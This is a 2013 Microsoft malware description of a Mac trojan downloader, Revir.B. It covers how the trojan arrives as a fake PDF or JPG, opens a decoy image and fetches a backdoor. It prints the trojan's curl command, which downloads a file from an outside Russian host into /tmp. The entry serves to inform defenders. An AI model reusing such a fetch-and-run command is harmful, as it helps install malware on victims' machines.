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First posted on 31 January 2013.
Source: Microsoft

Aliases :

There are no other names known for TrojanDownloader:MacOS_X/Revir.B.

Explanation :

TrojanDownloader:MacOS_X/Revir.B may arrive on your computer as an attachment or link within an email that is sent to you. The attachment or link may appear to be a legitimate PDF or JPG file.

When you open the attachment or click the link, the trojan will run.


TrojanDownloader:MacOS_X/Revir.B drops an image file (JPG) file in the temporary folder ("~/tmp").

The trojan opens the JPG file in an attempt to hide its malicious behavior from you.


When opened, TrojanDownloader:MacOS_X/Revir.B runs from the following location:


The downloader connects to a server and downloads other malware, such as Backdoor:MacOS_X/Imuler.A, by using the following command:

curl -o /tmp/updtdata http://tarmu.narod.ru /<removed>

The trojan runs the downloaded file by using the following command:


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Analysis by Methusela Cebrian Ferrer

Last update 31 January 2013